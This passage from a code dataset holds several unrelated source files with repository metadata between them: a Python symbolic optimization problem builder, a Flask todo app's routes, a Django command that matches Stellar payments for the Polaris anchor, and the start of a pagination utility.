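    saved = params.toJson()   # plain dict, suitable for storing alongside the problem
    params.fromJson(saved)    # restores the same settings
    return params.solve(problem, seed=seed)  # (success flag, solution vector)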
class OptimizationObjective:
"""
Describes an optimization cost function or constraint.
Attributes:
expr (symbolic.Expression): object f(x)
type (str): string describing what the objective does:
- 'cost': added to the cost. Must be scalar.
- 'eq': an equality f(x)=0 that must be met exactly (up to a given equality tolerance)
- 'ineq': an inequality constraint f(x)<=0
- 'feas': a black-box boolean feasibility test f(x) = True
soft (bool): if true, this is penalized as part of the cost function. Specifically
:math:`w \|f(x)\|^2` is the penalty for eq types, and w I[f(x)!=True] for feas types.
weight (float, optional): a weight, used only for cost or soft objectives
name (str, optional): a name for this objective.
"""
def __init__(self,expr,type,weight=None):
self.expr = expr
self.type = type
self.weight = weight
self.name = None
if weight is None or type == 'cost':
self.weight = 1
self.soft = False
else:
self.soft = True
class OptimizationProblemBuilder:
"""Defines a generalized optimization problem that can be saved/loaded from
a JSON string. Allows custom lists of objectives, feasibility tests, and cost functions.
Multiple variables can be optimized at once.
Attributes:
context (symbolic.Context): a context that stores the optimization variables and any user data.
        objectives (list of OptimizationObjective): all objectives or constraints used in the optimization.
optimizationVariables (list of Variable): A list of Variables used for optimization. If not set,
this will try to find the variable 'x'. If not found, this will use all unbound variables in
the objectives.
Note that objectives must be symbolic.Function
objects, so that they are savable/loadable. See the documentation of the symbolic
module for more detail.
"""
def __init__(self,context=None):
if context is None:
context = symbolic.Context()
self.context = context
self.objectives = []
        self.optimizationVariables = []
        self.variableBounds = {}
def addEquality(self,f,weight=None):
"""If f is a symbolic.Function it's a function f(x) that evaluates to 0 for a
        feasible solution. If it is a symbolic.Expression it's an expression over
        the optimization variables.
        If weight = None then this is an equality constraint. Otherwise
it gets added to the objective weight*||f(x)||^2."""
if isinstance(f,symbolic.Function):
assert len(self.optimizationVariables) > 0,"To add functions to constraints, the optimizationVariables object must be set"
return self.addEquality(f.context.bindFunction(f,self.optimizationVariables),weight)
else:
assert isinstance(f,symbolic.Expression)
self.objectives.append(OptimizationObjective(f,"eq",weight))
return self.objectives[-1]
def addInequality(self,f,weight=None):
"""Adds an inequality f(x) <= 0."""
        if isinstance(f,symbolic.Function):
assert len(self.optimizationVariables) > 0,"To add functions to constraints, the optimizationVariables object must be set"
return self.addInequality(self.context.bindFunction(f,self.optimizationVariables),weight)
else:
assert isinstance(f,symbolic.Expression)
            self.objectives.append(OptimizationObjective(f,"ineq",weight))
return self.objectives[-1]
def addCost(self,f,weight=1):
"""Adds a cost function f(q)."""
if isinstance(f,symbolic.Function):
assert len(self.optimizationVariables) > 0,"To add functions to constraints, the optimizationVariables object must be set"
return self.addCost(self.context.bindFunction(f,self.optimizationVariables))
else:
assert isinstance(f,symbolic.Expression)
self.objectives.append(OptimizationObjective(f,'cost',weight))
return self.objectives[-1]
def addFeasibilityTest(self,f,weight=None):
"""Adds an additional feasibility test."""
if isinstance(f,symbolic.Function):
return self.addFeasibilityTest(self.context.bindFunction(f,self.optimizationVariables),weight)
else:
assert isinstance(f,symbolic.Expression)
self.objectives.append(OptimizationObjective(f,'feas',weight))
return self.objectives[-1]
def setBounds(self,var,xmin=None,xmax=None):
"""Bounds the optimization variable var"""
if isinstance(var,symbolic.Variable):
var = var.name
if xmin is None and xmax is None:
if var in self.variableBounds:
del self.variableBounds[var]
else:
self.variableBounds[var] = (xmin,xmax)
def bind(self,**kwargs):
"""Binds the variables specified by the keyword arguments"""
        for (k,v) in kwargs.items():
            self.context.variableDict[k].bind(v)
    def unbind(self,**kwargs):
        """Unbinds the variables specified by the keyword arguments"""
        for k in kwargs:
            self.context.variableDict[k].unbind()
def bindVars(self,*args):
for x,v in zip(self.optimizationVariables,args):
x.bind(v)
def unbindVars(self):
for x in self.optimizationVariables:
x.unbind()
def getVarValues(self):
"""Saves the bindings for optimization variables in the current context into a list."""
return [v.value for v in self.optimizationVariables]
def setVarValues(self,s):
"""Converts a state into bindings for the optimization variables in the current context."""
for (v,var) in zip(s,self.optimizationVariables):
var.bind(v)
def getVarVector(self):
"""Flattens the bindings for optimization variables in the current context into a vector x."""
return symbolic._flatten(*[v.value for v in self.optimizationVariables])
def setVarVector(self,x):
"""Turns a vector x into bindings for the optimization variables in the current context."""
ofs=0
for v in self.optimizationVariables:
if v.type.is_scalar():
v.bind(x[ofs])
ofs += 1
else:
assert v.type.char == 'V',"TODO: handle matrix/array variables"
v.bind(x[ofs:ofs+v.type.size])
ofs += v.type.size
def randomVarBinding(self):
"""Samples values for all optimization variables, sampling uniformly according to their bounds"""
for k,bnds in self.variableBounds.items():
var = self.context.variableDict[k]
if var.type.is_scalar():
var.bind(sample_range(*bnds))
else:
var.bind([sample_range(a,b) for (a,b) in zip(*bnds)])
for var in self.optimizationVariables:
if var.name not in self.variableBounds:
infbnd = (-float('inf'),float('inf'))
if var.type.is_scalar():
var.bind(sample_range(*infbnd))
else:
                    assert var.type.char == 'V',"TODO: handle matrix/array variables"
assert var.type.size >= 0
var.bind([sample_range(*infbnd) for i in range(var.type.size)])
def cost(self):
"""Evaluates the cost function with the variables already bound."""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
robset = False
csum = 0.0
for obj in self.objectives:
if obj.type == 'cost':
#print obj.weight,obj.expr.evalf(self.context)
csum += obj.weight*obj.expr.evalf(self.context)
elif obj.soft:
if obj.type == 'eq':
r = obj.expr.evalf(self.context)
                    csum += obj.weight*np.dot(r,r)
elif obj.type == 'feas':
if not obj.expr.evalf(self.context):
csum += obj.weight
elif obj.type == 'ineq':
raise NotImplementedError("Soft inequalities")
return csum
def equalityResidual(self,soft=True):
"""Evaluates the equality + ik functions at the currently bound state x, stacking the results
into a single vector. The residual should equal 0 (to a small tolerance) at a feasible
solution.
If soft=True, also stacks the soft equalities.
"""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
robset = False
esum = []
for obj in self.objectives:
if obj.type == 'eq' and (not obj.soft or soft):
esum.append(obj.expr.evalf(self.context)*obj.weight)
return symbolic._flatten(*esum)
def satisfiesEqualities(self,tol=1e-3):
"""Returns True if every entry of the (hard) equality + IK residual equals 0 (to the tolerance tol)."""
res = self.equalityResidual()
if len(res) == 0: return True
return all(abs(r) <= tol for r in res)
def inequalityResidual(self,soft=False):
"""Evaluates the inequality functions at the currently bound state x, stacking the results
into a single vector. The residual should be <= 0 at a feasible
solution.
If soft=True then this includes the soft inequality residuals.
"""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
robset = False
esum = []
for obj in self.objectives:
if obj.type == 'ineq' and (not obj.soft or soft):
esum.append(obj.expr.evalf(self.context)*obj.weight)
return symbolic._flatten(*esum)
def satisfiesInequalities(self,margin=0):
"""Returns True if the for currently bound state x, every entry of the (hard) inequality residuals is
<= -margin (default 0)."""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
res = self.inequalityResidual()
if len(res) == 0: return True
return all(r <= -margin for r in res)
def feasibilityTestsPass(self,soft=False):
"""Returns True if the currently bound state passes all black-box feasibility tests."""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
for obj in self.objectives:
            if obj.type == 'feas' and (not obj.soft or soft):
r = obj.expr.evalf(self.context)
if not r: return False
return True
def inBounds(self):
"""Returns True if all bounded variables are within their ranges at the currently bound state x"""
for k,bnds in self.variableBounds.items():
var = self.context.variableDict[k]
assert var.value is not None,"All optimization variables must be bound"
xmin,xmax = bnds
if not symbolic_linalg.bound_contains(xmin,xmax,var.value).evalf():
return False
return True
def isFeasible(self,eqTol=1e-3):
"""Returns True if the currently bound state passes all equality, inequality, joint limit, and black-box feasibility
        tests. Equality and IK constraints must be met with equality tolerance eqTol."""
if not self.inBounds(): return False
res = self.equalityResidual()
if any(abs(r) > eqTol for r in res):
return False
res = self.inequalityResidual()
if any(r > 0 for r in res):
return False
if not self.feasibilityTestsPass(): return False
return True
def costSymbolic(self):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to the cost"""
components = []
weights = []
for obj in self.objectives:
if obj.type == 'cost':
components.append(obj.expr)
weights.append(obj.weight)
elif obj.soft:
if obj.type == 'eq':
components.append(symbolic_linalg.dot(obj.expr,obj.expr))
weights.append(obj.weight)
elif obj.type == 'feas':
components.append(symbolic.if_(obj.expr,1,0))
weights.append(obj.weight)
else:
raise NotImplementedError("Soft inequalities")
if len(components)==0:
return None
oldvals = self.getVarValues()
self.unbindVars()
res = symbolic.simplify(symbolic.weightedsum(*(components + weights)),self.context)
self.setVarValues(oldvals)
return res
#return symbolic.weightedsum(*(components + weights))
def equalityResidualSymbolic(self,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to the equality residual"""
components = []
for obj in self.objectives:
if obj.type == 'eq' and (not obj.soft or soft):
components.append(obj.expr*obj.weight)
if len(components) == 0: return None
oldvals = self.getVarValues()
self.unbindVars()
res = symbolic.simplify(symbolic.flatten(*components),self.context)
self.setVarValues(oldvals)
return res
def inequalityResidualSymbolic(self,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to the inequality residual"""
components = []
for obj in self.objectives:
if obj.type == 'ineq' and (not obj.soft or soft):
components.append(obj.expr*obj.weight)
if len(components) == 0: return None
oldvals = self.getVarValues()
self.unbindVars()
res = symbolic.simplify(symbolic.flatten(*components),self.context)
self.setVarValues(oldvals)
return res
def equalitySatisfiedSymbolic(self,tol=1e-3,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to True if the equality constraint is met with tolerance tol"""
res = self.equalityResidualSymbolic(soft)
if res is None: return None
return symbolic.abs_(res) <= tol
def inequalitySatisfiedSymbolic(self,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to True if the inequality constraint is met"""
res = self.inequalityResidualSymbolic(soft)
if res is None: return None
return res <= 0
def feasibilityTestsPassSymbolic(self,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to True if the black-box feasibility constraints are met"""
components = []
for obj in self.objectives:
            if obj.type == 'feas' and (not obj.soft or soft):
components.append(obj.expr)
if len(components) == 0: return None
oldvals = self.getVarValues()
self.unbindVars()
res = symbolic.simplify(symbolic.all_(*components),self.context)
self.setVarValues(oldvals)
return res
def inBoundsSymbolic(self):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to True the configuration meets bound constraints"""
exprs = []
for k,bnd in self.variableBounds.items():
            exprs.append(symbolic_linalg.bound_contains(bnd[0],bnd[1],self.context.get(k)))
return symbolic.all_(*exprs)
def isFeasibleSymbolic(self,eqTol=1e-3):
"""Returns a symbolic.Expression, over $q and other user data variables, that
evaluates to True if the configuration meets all feasibility tests"""
tests = [self.inBoundsSymbolic(),self.equalitySatisfiedSymbolic(eqTol),self.inequalitySatisfiedSymbolic(),self.feasibilityTestsPassSymbolic()]
return symbolic.all_(*[t for t in tests if t is not None])
def score(self,eqWeight=1.0,ineqWeight=1.0,infeasWeight=1.0):
"""Returns an error score that is equal to the optimum at a feasible
solution. Evaluated at the currently bound state x."""
c = self.cost()
if eqWeight != 0:
res = self.equalityResidual()
if len(res) > 0:
                c += eqWeight*np.linalg.norm(res)
if ineqWeight != 0:
res = self.inequalityResidual()
if len(res) > 0:
                c += ineqWeight*np.linalg.norm(res)
if infeasWeight != 0:
for obj in self.objectives:
                if obj.type == 'feas' and not obj.soft:
                    if not obj.expr.evalf(self.context):
c += infeasWeight
if not self.inBounds():
c += infeasWeight
return c
def pprint(self,indent=0):
ncost = len([obj for obj in self.objectives if obj.type == "cost" or obj.soft])
istring = " "*indent
if ncost == 0:
print("%sfind[%s]"%(istring,",".join([v.name for v in self.optimizationVariables])))
else:
print("%smin[%s] %s"%(istring,",".join([v.name for v in self.optimizationVariables]),str(self.costSymbolic())))
if ncost < len(self.objectives) or len(self.variableBounds) > 0:
print("%s such that"%(istring,))
for obj in self.objectives:
if not(obj.type == "cost" or obj.soft):
print("%s%s%s"%(istring,("" if obj.name is None else obj.name+": "),str(obj.expr)), end=' ')
if obj.type == "eq":
print("= 0")
elif obj.type == "ineq":
print("<= 0")
else:
print("holds")
for k,v in self.variableBounds.items():
if hasattr(v[0],'__iter__'):
for i in range(len(v[0])):
print("%s[%f]\t"%(istring,v[0][i]), end=' ')
if i == len(v[0])/2:
print("<=",k,"<=\t", end=' ')
else:
print("\t", end=' ')
print("[%f]"%(v[1][i],))
else:
print("%s%f <= %s <= %f"%(istring,v[0],k,v[1]))
def toJson(self,saveContextFunctions=False,prettyPrintExprs=False):
"""Returns a JSON object representing this optimization problem.
Args:
saveContextFunctions (bool, optional): if True, saves all custom functions in
self.context. If they are saved, then the current context is required to be
the same context in which the problem is loaded.
prettyPrintExprs (bool, optional): if True, prints expressions more nicely as more
human-readable strings rather than JSON objects. These strings are parsed on load,
which is a little slower than pure JSON.
"""
res = dict()
res['type'] = 'OptimizationProblemBuilder'
res['context'] = symbolic_io.contextToJson(self.context,saveFunctions=saveContextFunctions)
objectivesJson = []
for o in self.objectives:
if prettyPrintExprs:
ojson = {'expr':symbolic_io.exprToStr(o.expr,parseCompatible=True),'type':o.type,'soft':o.soft,'weight':o.weight,'name':o.name}
else:
                ojson = {'expr':symbolic_io.exprToJson(o.expr),'type':o.type,'soft':o.soft,'weight':o.weight,'name':o.name}
objectivesJson.append(ojson)
res['objectives'] = objectivesJson
res['optimizationVariables'] = [v.name for v in self.optimizationVariables]
res['variableBounds'] = self.variableBounds
return res
def fromJson(self,object,context=None):
"""Sets this IK problem to a JSON object representing it. A ValueError
is raised if it is not the correct type."""
if object['type'] != 'OptimizationProblemBuilder':
raise ValueError("Object must have type OptimizationProblemBuilder")
if context is not None:
self.context = context
else:
symbolic_io.contextFromJson(self.context,object['context'])
self.objectives = []
for ojson in object['objectives']:
if isinstance(ojson['expr'],str):
expr = symbolic_io.exprFromStr(self.context,ojson['expr'])
else:
expr = symbolic_io.exprFromJson(self.context,ojson['expr'])
self.objectives.append(OptimizationObjective(expr,ojson['type'],(ojson['weight'] if ojson['soft'] else None)))
self.objectives[-1].name = ojson['name']
self.optimizationVariables = []
for n in object['optimizationVariables']:
assert n in self.context.variableDict,"Context does not contain optimization variable "+n
self.optimizationVariables.append(self.context.variableDict[n])
self.variableBounds = object['variableBounds']
return
def preprocess(self,steps='all'):
"""Preprocesses the problem to make solving more efficient
Returns:
tuple: (opt,optToSelf,selfToOpt)
            - opt: a simplified version of this optimization problem. If no simplification can be performed, opt = self
- optToSelf: a map of opt's variables to self's variables. If no simplification can be performed, optToSelf = None
- selfToOpt: a map of self's variables to opts's variables. If no simplification can be performed, selfToOpt = None
Specific steps include:
# delete any objectives with 0 weight
# delete any optimization variables not appearing in expressions
# fixed-bound (x in [a,b], with a=b) variables are replaced with fixed values.
# simplify objectives
# TODO: replace equalities of the form var = expr by matching var to expr?
If optToSelf is not None, then it is a list of Expressions that, when eval'ed, produce the values of the corresponding
optimizationVariables in the original optimization problem. selfToOpt performs the converse mapping.
In other words, if opt has bound values to all of its optimizationVariables, the code::
for var,expr in zip(self.optimizationVariables,optToSelf):
var.bind(expr.eval(opt.context))
binds all optimization variables in self appropriately.
"""
modified = False
result = OptimizationProblemBuilder(self.context)
result.optimizationVariables = []
optToSelf = []
selfToOpt = []
for v in self.optimizationVariables:
if v.name not in self.variableBounds:
result.optimizationVariables.append(v.name)
optToSelf.append(symbolic.expr(result.context.variableDict[v.name]))
selfToOpt.append(symbolic.expr(v))
else:
xmin,xmax = self.variableBounds[v.name]
if v.type.is_scalar():
if xmin == xmax:
#remove from optimization
if not modified:
result.context = self.context.copy()
modified = True
                        result.context.variableDict[v.name].bind(xmin)
else:
assert v.type.char == 'V',"TODO: handle non numeric/vector valued variables, type %s"%(v.type,)
activeDofs = []
inactiveDofs = []
for i in range(len(xmin)):
if xmin[i] == xmax[i]:
inactiveDofs.append(i)
else:
activeDofs.append(i)
if len(activeDofs) == 0:
if not modified:
result.context = self.context.copy()
modified = True
result.context.variableDict[v.name].bind(xmin)
#don't add to optimization variables
print("OptimizationProblemBuilder.preprocess(): No active DOFS on",v.name,"removing from optimization variables")
print(" xmin",xmin,"xmax",xmax)
elif len(inactiveDofs) > 0:
if not modified:
result.context = self.context.copy()
modified = True
vact = result.context.variableDict[v.name]
vact.type.size = len(activeDofs)
assert any(vact is v for v in result.context.variables)
if v.value is not None:
vact.value = [v.value[d] for d in activeDofs]
vlift = symbolic.setitem(xmin,activeDofs,vact)
result.optimizationVariables.append(v.name)
optToSelf.append(vlift)
selfToOpt.append(symbolic.getitem(v,activeDofs))
if v.name in self.variableBounds:
vmin,vmax = self.variableBounds[v.name]
result.setBounds(v.name,[vmin[d] for d in activeDofs],[vmax[d] for d in activeDofs])
else:
result.optimizationVariables.append(v.name)
if v.name in self.variableBounds:
vmin,vmax = self.variableBounds[v.name]
result.setBounds(v.name,vmin,vmax)
optToSelf.append(symbolic.expr(result.context.variableDict[v.name]))
selfToOpt.append(symbolic.expr(v))
#print "OptimizationProblemBuilder.preprocess(): optimization variables",[str(v) for v in self.optimizationVariables],"->",[str(v) for v in result.optimizationVariables]
assert modified != (len(optToSelf) == 0 and len(result.optimizationVariables) == len(self.optimizationVariables))
#delete any objectives with 0 weight
sourceObjectives = self.objectives
if any(obj.weight==0 for obj in self.objectives):
modified = True
sourceObjectives = [obj for obj in self.objectives if obj.weight != 0]
if not modified:
return self,None,None
#convert names to Variables
result.optimizationVariables = [result.context.variableDict[vname] for vname in result.optimizationVariables]
#simplify and remap expressions
oldVals = self.getVarValues()
for var in self.optimizationVariables:
var.unbind()
for i,obj in enumerate(sourceObjectives):
expr = symbolic.simplify(obj.expr,result.context)
for var,vexpr in zip(result.optimizationVariables,optToSelf):
try:
expr = expr.replace(var,vexpr)
except ValueError:
pass
#print "Replacement for",obj.type,"objective",obj.expr,"is",expr
expr = symbolic.simplify(expr)
#print " simplified to",expr
#raw_input()
result.objectives.append(OptimizationObjective(expr,obj.type,obj.weight))
result.objectives[-1].soft = obj.soft
result.objectives[-1].name = obj.name
self.setVarValues(oldVals)
return (result,optToSelf,selfToOpt)
def getBounds(self):
"""Returns optimization varable bounds as a list of (xmin,xmax) pairs. None is returned if the
problem is unconstrained"""
inf = float('inf')
if len(self.variableBounds) == 0 or not any(v.name in self.variableBounds for v in self.optimizationVariables):
return None
return [self.variableBounds.get(v.name,((-inf,inf) if v.type.is_scalar() else ([-inf]*v.type.size,[inf]*v.type.size))) for v in self.optimizationVariables]
def getProblem(self):
"""Returns an OptimizationProblem instance over the optimization variables.
"""
optProblem = OptimizationProblem()
eq = self.equalityResidualSymbolic()
ineq = self.inequalityResidualSymbolic()
feas = self.feasibilityTestsPassSymbolic()
cost = self.costSymbolic()
if len(self.optimizationVariables) == 0:
if 'x' in self.context.variableDict:
                self.optimizationVariables = [self.context.variableDict['x']]
else:
raise NotImplementedError("No optimization variables set; dynamic interpretation not complete yet")
#to prevent simplification from destroying variable references, save the values and unbind them...
oldValues = self.getVarValues()
self.unbindVars()
if eq is not None: optProblem.addSymbolicConstraint((symbolic.simplify(eq,self.context) == 0),self.context,self.optimizationVariables)
if ineq is not None: optProblem.addSymbolicConstraint((symbolic.simplify(ineq,self.context) <= 0),self.context,self.optimizationVariables)
if feas is not None: optProblem.addSymbolicConstraint(symbolic.simplify(feas,self.context),self.context,self.optimizationVariables)
if cost is not None: optProblem.setSymbolicObjective(symbolic.simplify(cost,self.context),self.context,self.optimizationVariables)
vbounds = self.getBounds()
if vbounds is not None:
aggxmin = symbolic._flatten(*[bmin for (bmin,bmax) in vbounds])
aggxmax = symbolic._flatten(*[bmax for (bmin,bmax) in vbounds])
optProblem.setBounds(aggxmin,aggxmax)
#restore unbound variables
self.setVarValues(oldValues)
return optProblem
def solve(self,params=OptimizerParams(),preprocess=True,cache=False):
"""Solves the optimization problem. The result is stored in the bound optimizationVariables.
If you will be solving the problem several times without modification (except for user data and
initial values of optimizationVariables), you may set cache=True to eliminate some overhead.
Note that caching does not work properly if you change constraints or non-optimization variables.
"""
print("OptimizationProblemBuilder.solve(): My optimization variables",[v.name for v in self.optimizationVariables])
#first check for cached values
if cache and hasattr(self,'_cached_problem'):
p,pToSelf,selfToP,optp = self._cached_problem
else:
#if not, do the preprocessing
if preprocess:
p,pToSelf,selfToP = self.preprocess()
else:
p = self
pToSelf,selfToP = None,None
optp = p.getProblem()
if cache:
self._cached_problem = p,pToSelf,selfToP,optp
seed = None
if params.globalMethod is None or params.globalMethod == 'random-restart':
#ensure that you have a seed
vseed = [v.value for v in p.optimizationVariables]
if all(v is not None for v in vseed):
seed = symbolic._flatten(vseed)
else:
assert all(v is None for v in vseed),"TODO: instantiation of partially bound values"
assert params.globalMethod is not None,"Only doing local optimization, need to provide a seed value"
(success,res) = params.solve(optp,seed)
if res is not None:
p.setVarVector(res)
if p is not self:
#the vector was set in a different context, now map p's variables to self's variables
for v,expr in zip(self.optimizationVariables,pToSelf):
v.bind(expr.eval(p.context))
return success
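    # Usage sketch (illustrative only; assumes a populated OptimizationProblemBuilder named
    # `builder` and default OptimizerParams -- these names are not part of the API above):
    #   params = OptimizerParams()
    #   if builder.solve(params, preprocess=True, cache=True):
    #       # on success, the optimization variables are bound to the solution
    #       solution = {v.name: v.value for v in builder.optimizationVariables}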
| 48.352941
| 177
| 0.579119
|
844b30e9784d81833548d8835d6ea8fcce6267f5
| 925
|
py
|
Python
|
Web dev/Flask/Projects/todo-app/app/routes.py
|
prathimacode-hub/WIE-WoC
|
f412f297a57249af98213bf4a747c897f2d4c035
|
[
"MIT"
] | 8
|
2022-03-01T09:09:20.000Z
|
2022-03-03T05:36:01.000Z
|
Web dev/Flask/Projects/todo-app/app/routes.py
|
prathimacode-hub/WIE-WoC
|
f412f297a57249af98213bf4a747c897f2d4c035
|
[
"MIT"
] | 52
|
2022-03-02T13:52:46.000Z
|
2022-03-04T03:03:17.000Z
|
Web dev/Flask/Projects/todo-app/app/routes.py
|
prathimacode-hub/WIE-WoC
|
f412f297a57249af98213bf4a747c897f2d4c035
|
[
"MIT"
] | 23
|
2022-03-01T06:39:34.000Z
|
2022-03-03T09:24:40.000Z
|
from flask import render_template, redirect, url_for, request
from app import app, db
from app.models import Todo
@app.route('/')
def index():
incomplete = Todo.query.filter_by(status=False).all()
complete = Todo.query.filter_by(status=True).all()
return render_template('index.html', complete=complete, incomplete=incomplete)
@app.route('/add', methods=['POST'])
def add():
todo = Todo(text=request.form['todoitem'], status=False)
db.session.add(todo)
db.session.commit()
return redirect(url_for('index'))
@app.route('/complete/<id>')
def complete(id):
todo = Todo.query.filter_by(id=int(id)).first()
todo.status = True
db.session.commit()
return redirect(url_for('index'))
@app.route('/incomplete/<id>')
def incomplete(id):
todo = Todo.query.filter_by(id=int(id)).first()
todo.status = False
db.session.commit()
return redirect(url_for('index'))
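# Usage sketch (assumes the standard Flask CLI; illustrative only):
#   $ export FLASK_APP=app && flask run
#   The index page lists complete/incomplete todos; POST to /add with form field
#   'todoitem' to create one, and visit /complete/<id> or /incomplete/<id> to toggle status.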
| 25.694444
| 82
| 0.678919
|
8122dc4db005fa7d78e1a0336f95e63b27d862c7
| 8,782
|
py
|
Python
|
polaris/polaris/management/commands/watch_transactions.py
|
paysharesdev/django-polaris
|
cbbebed5623a92074071f59f4bca65e2b1c6571b
|
[
"Apache-2.0"
] | null | null | null |
polaris/polaris/management/commands/watch_transactions.py
|
paysharesdev/django-polaris
|
cbbebed5623a92074071f59f4bca65e2b1c6571b
|
[
"Apache-2.0"
] | null | null | null |
polaris/polaris/management/commands/watch_transactions.py
|
paysharesdev/django-polaris
|
cbbebed5623a92074071f59f4bca65e2b1c6571b
|
[
"Apache-2.0"
] | null | null | null |
"""This module defines custom management commands for the app admin."""
import asyncio
from typing import Dict, Optional
from decimal import Decimal
from django.core.management.base import BaseCommand
from django.db.models import Q
from stellar_sdk.exceptions import NotFoundError
from stellar_sdk.transaction_envelope import TransactionEnvelope
from stellar_sdk.xdr import Xdr
from stellar_sdk.operation import Operation
from stellar_sdk.server import Server
from stellar_sdk.client.aiohttp_client import AiohttpClient
from polaris import settings
from polaris.models import Asset, Transaction
from polaris.utils import Logger
logger = Logger(__name__)
class Command(BaseCommand):
"""
Streams transactions for the distribution account of each Asset in the DB.
For every response from the server, attempts to find a matching transaction in
the database with `find_matching_payment_op` and updates the transaction's
status to `pending_anchor` or `pending_receiver` depending on the protocol.
Then, the ``execute_outgoing_transaction`` process will query for transactions
in those statuses and provide the anchor an integration function for executing
the payment or withdrawal.
"""
def handle(self, *args, **options): # pragma: no cover
try:
asyncio.run(self.watch_transactions())
except Exception as e:
# This is very likely a bug, so re-raise the error and crash.
# Heroku will restart the process unless it is repeatedly crashing,
# in which case restarting isn't of much use.
logger.exception("watch_transactions() threw an unexpected exception")
raise e
async def watch_transactions(self): # pragma: no cover
await asyncio.gather(
*[
self._for_account(asset.distribution_account)
for asset in Asset.objects.exclude(distribution_seed__isnull=True)
]
)
async def _for_account(self, account: str): # pragma: no cover
"""
Stream transactions for the server Stellar address.
"""
async with Server(settings.HORIZON_URI, client=AiohttpClient()) as server:
try:
# Ensure the distribution account actually exists
await server.load_account(account)
except NotFoundError:
# This exception will crash the process, but the anchor needs
# to provide valid accounts to watch.
raise RuntimeError(
"Stellar distribution account does not exist in horizon"
)
last_completed_transaction = (
Transaction.objects.filter(
Q(kind=Transaction.KIND.withdrawal) | Q(kind=Transaction.KIND.send),
receiving_anchor_account=account,
status=Transaction.STATUS.completed,
)
.order_by("-completed_at")
.first()
)
cursor = "now"
if last_completed_transaction:
cursor = last_completed_transaction.paging_token
endpoint = server.transactions().for_account(account).cursor(cursor)
async for response in endpoint.stream():
self.process_response(response, account)
@classmethod
def process_response(cls, response, account):
# We should not match valid pending transactions with ones that were
# unsuccessful on the stellar network. If they were unsuccessful, the
# client is also aware of the failure and will likely attempt to
# resubmit it, in which case we should match the resubmitted transaction
if not response.get("successful"):
return
# Query filters for SEP6 and 24
withdraw_filters = Q(
receiving_anchor_account=account,
status=Transaction.STATUS.pending_user_transfer_start,
kind=Transaction.KIND.withdrawal,
)
# Query filters for SEP31
send_filters = Q(
receiving_anchor_account=account,
status=Transaction.STATUS.pending_sender,
kind=Transaction.KIND.send,
)
pending_withdrawal_transactions = Transaction.objects.filter(
# query SEP 6, 24, & 31 pending transactions
withdraw_filters
| send_filters
)
matching_transaction, payment_op = None, None
for transaction in pending_withdrawal_transactions:
payment_op = cls.find_matching_payment_op(response, transaction)
if not payment_op:
continue
else:
matching_transaction = transaction
break
if not matching_transaction:
logger.info(f"No match found for stellar transaction {response['id']}")
return
# Transaction.amount_in is overwritten with the actual amount sent in the stellar
# transaction. This allows anchors to validate the actual amount sent in
# execute_outgoing_transactions() and handle invalid amounts appropriately.
matching_transaction.amount_in = round(
Decimal(payment_op.amount), matching_transaction.asset.significant_decimals,
)
# The stellar transaction has been matched with an existing record in the DB.
# Now the anchor needs to initiate the off-chain transfer of the asset.
#
        # Prior to the 0.12 release, Polaris' SEP-6 and 24 integrations didn't
# provide an interface that allowed anchors to check on the state of
# transactions on an external network. Now, ``poll_outgoing_transactions()``
# allows anchors to check on transactions that have been submitted to a
# non-stellar payment network but have not completed, and expects anchors to
# update them when they have.
if matching_transaction.protocol == Transaction.PROTOCOL.sep31:
# SEP-31 uses 'pending_receiver' status
matching_transaction.status = Transaction.STATUS.pending_receiver
matching_transaction.save()
else:
            # SEP-6 and 24 use the 'pending_anchor' status
matching_transaction.status = Transaction.STATUS.pending_anchor
matching_transaction.save()
return
@classmethod
def find_matching_payment_op(
cls, response: Dict, transaction: Transaction
) -> Optional[Operation]:
"""
Determines whether or not the given ``response`` represents the given
        ``transaction``. Polaris does this by checking that the 'memo' field in the horizon
        response matches ``transaction.memo``, as well as ensuring the
transaction includes a payment operation of the anchored asset.
:param response: a response body returned from Horizon for the transaction
:param transaction: a database model object representing the transaction
"""
try:
stellar_transaction_id = response["id"]
envelope_xdr = response["envelope_xdr"]
except KeyError:
return
# memo from response must match transaction memo
memo = response.get("memo")
if (
transaction.protocol != Transaction.PROTOCOL.sep31
and memo != transaction.memo
) or (
transaction.protocol == Transaction.PROTOCOL.sep31
and memo != transaction.memo
):
return
horizon_tx = TransactionEnvelope.from_xdr(
envelope_xdr, network_passphrase=settings.STELLAR_NETWORK_PASSPHRASE,
).transaction
if horizon_tx.source.public_key != transaction.stellar_account:
# transaction wasn't created by sender of payment
return
matching_payment_op = None
for operation in horizon_tx.operations:
if cls._check_payment_op(operation, transaction.asset):
transaction.stellar_transaction_id = stellar_transaction_id
transaction.from_address = horizon_tx.source.public_key
transaction.paging_token = response["paging_token"]
transaction.status_eta = 0
transaction.save()
matching_payment_op = operation
break
return matching_payment_op
@staticmethod
def _check_payment_op(operation: Operation, want_asset: Asset) -> bool:
return (
operation.type_code() == Xdr.const.PAYMENT
and str(operation.destination) == want_asset.distribution_account
and str(operation.asset.code) == want_asset.code
and str(operation.asset.issuer) == want_asset.issuer
)
| 42.019139
| 89
| 0.654407
|
273254e0f855b050bd2d5f1db51c4c97ba0d6b8b
| 2,564
|
py
|
Python
|
app/utils.py
|
Cradac/dhbw-microblog
|
4f2bda483ec3864973a082038fec2bc8a9898bb2
|
[
"MIT"
] | null | null | null |
app/utils.py
|
Cradac/dhbw-microblog
|
4f2bda483ec3864973a082038fec2bc8a9898bb2
|
[
"MIT"
] | null | null | null |
app/utils.py
|
Cradac/dhbw-microblog
|
4f2bda483ec3864973a082038fec2bc8a9898bb2
|
[
"MIT"
] | null | null | null |
from app.models import User
'''
The Paginator object with all relevant variables.
list: super-list of all sub-lists (pages)
cur_page: current page (index + 1 into list)
max_page: number of pages
items: list[cur_page-1], i.e. the contents of the current page;
